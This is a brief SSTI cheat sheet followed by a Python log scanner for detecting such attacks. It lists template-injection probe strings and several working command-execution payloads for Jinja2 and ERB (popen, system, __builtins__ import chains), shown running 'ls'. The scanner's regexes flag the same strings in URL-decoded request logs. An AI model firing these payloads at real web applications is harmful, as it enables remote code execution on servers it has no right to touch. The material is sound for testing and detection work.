SSTI

Checking for SSTI:

{{3*3}}
<%= 3 * 3 %>
${{3*3}}

Working basic payloads

{{"foo".__class__.__base__.__subclasses__()[182].__init__.__globals__['sys'].modules['os'].popen("ls").read()}}

<%= system("ls") %>
"{{ self.__init__.__globals__.__builtins__.__import__('os').popen('ls').read() }}"
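Detection side of the strings above, as an added example that is not part of the original notes: a log scanner that URL-decodes request parameters (including double encoding) and flags the arithmetic probes and the attribute-chain / command payloads listed on this page. The function names, the sample log lines and the /greet and /preview paths are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Template delimiters used by the probes on this page: {{ }}, ${{ }}, <%= %>
DELIMS = r"(?:\$?\{\{(?P<a>.*?)\}\}|<%=(?P<b>.*?)%>)"
ARITH = re.compile(r"^\s*\d+\s*[*+/-]\s*\d+\s*$")
# Dunder attribute chains and command execution, as in the page's payloads
ESCAPE = re.compile(r"__\w+__|\bpopen\b|\bsystem\s*\(")

def decode(value, rounds=3):
    """URL-decode repeatedly so double-encoded probes are still seen."""
    for _ in range(rounds):
        nxt = unquote_plus(value)
        if nxt == value:
            break
        value = nxt
    return value

def classify(raw):
    """Return 'payload', 'probe' or None for one request parameter value."""
    text = decode(raw)
    verdict = None
    for m in re.finditer(DELIMS, text, re.S):
        inner = m.group("a") if m.group("a") is not None else m.group("b")
        if ESCAPE.search(inner):
            return "payload"      # strongest signal wins immediately
        if ARITH.match(inner):
            verdict = "probe"     # keep looking in case a payload follows
    return verdict

def scan(lines):
    """Return (line_no, verdict) for each flagged parameter in the log."""
    hits = []
    for n, line in enumerate(lines, 1):
        query = line.split("?", 1)[1].split(" ", 1)[0] if "?" in line else ""
        for pair in query.split("&"):
            verdict = classify(pair.split("=", 1)[-1])
            if verdict:
                hits.append((n, verdict))
    return hits

# Constructed sample access-log lines (not real traffic)
SAMPLE = [
    "GET /greet?name=alice HTTP/1.1",
    "GET /greet?name=%7B%7B3*3%7D%7D HTTP/1.1",
    "GET /greet?name=%253C%2525%253D%25203%2520*%25203%2520%2525%253E HTTP/1.1",
    "GET /greet?name=%7B%7Bself.__init__.__globals__%7D%7D&lang=en HTTP/1.1",
    "POST /preview?body=%3C%25%3D%20system(%22ls%22)%20%25%3E HTTP/1.1",
]
```

A 'probe' hit means someone is testing whether input reaches a template engine; a 'payload' hit on an endpoint that renders user input should be triaged as a possible code-execution attempt.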
